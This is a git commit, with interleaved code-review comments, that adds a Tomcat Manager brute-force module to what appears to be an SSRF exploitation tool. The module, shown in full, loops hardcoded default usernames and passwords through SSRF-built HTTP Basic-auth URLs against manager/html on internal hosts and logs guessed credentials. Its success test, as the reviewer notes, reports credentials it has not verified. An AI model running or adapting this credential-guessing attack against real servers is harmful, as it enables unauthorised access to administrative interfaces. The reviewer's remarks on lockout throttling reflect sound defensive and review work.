MODULE - Tomcat module - bruteforce attack against manager

pull/7/head
Swissky 2018-12-29 22:12:45 +01:00
parent ec40fe1f91
commit e8751bb51e
4 changed files with 35 additions and 1 deletions


@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |
## Contribute


@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
def wrapper_dict(data, ip, port):
return "dict://{}:{}/{}".format(ip, port, data)
def wrapper_http(data, ip, port):
def wrapper_http(data, ip, port, usernm=False, passwd=False):
if usernm != False and passwd != False:
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
return "http://{}:{}/{}".format(ip, port, data)
def wrapper_https(data, ip, port):
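Review bot: `usernm` and `passwd` are formatted straight into the URL userinfo in the new branch of `wrapper_http`, so a value containing `@`, `:`, `/` or `#` produces a URL whose host or path is parsed differently from what the caller passed as `ip`. Percent-encode both values before formatting, e.g. `quote(usernm, safe="")` and `quote(passwd, safe="")` with `quote` from `urllib.parse` (assuming the project targets Python 3). The `False` defaults compared with `!= False` also treat `0` as unset; `usernm=None, passwd=None` checked with `is not None` states the intent more clearly. `wrapper_https` starts on the last line of the hunk and its body is outside it.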

31
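--- a/modules/tomcat.py
+++ b/modules/tomcat.py
@@ -0,0 +1,31 @@
+from core.utils import *
+import logging
+name = "tomcat"
+description = "Tomcat - Bruteforce manager"
+author = "Swissky"
+documentation = [
+"https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html",
+"https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
+]
+class exploit():
+SERVER_HOST = "127.0.0.1"
+SERVER_PORT = "8888"
+SERVER_TOMCAT = "manager/html"
+tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
+tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
+def __init__(self, requester, args):
+logging.info("Module '{}' launched !".format(name))
+# Using a generator to create the host list
+gen_host = gen_ip_list(self.SERVER_HOST, args.level)
+for ip in gen_host:
+for usr in self.tomcat_user:
+for pss in self.tomcat_pass:
+payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
+r = requester.do_request(args.param, payload)
+if not "s3cret" in r.text:
+logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))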
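Review bot: The success test `if not "s3cret" in r.text` logs "Found credential" for every response that lacks that string, which includes an error page or an empty body from a host that runs no Tomcat at all, so the entries in the log are unverified. I would document the heuristic directly above the check, `# Tomcat's default 401 page for the manager prints the sample password "s3cret"; its absence does not prove the login was accepted`, and write the condition as `if "s3cret" not in r.text:`. The class also lacks a docstring: it should say that constructing it sends every pair from `tomcat_user` and `tomcat_pass` as HTTP Basic credentials to `manager/html` on each generated host, which appears as a burst of 401 responses in the Tomcat access log and is the pattern `LockOutRealm` exists to throttle. `from core.utils import *` hides where `gen_ip_list` and `wrapper_http` come from; importing the two names explicitly would make that visible.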

Binary file not shown.
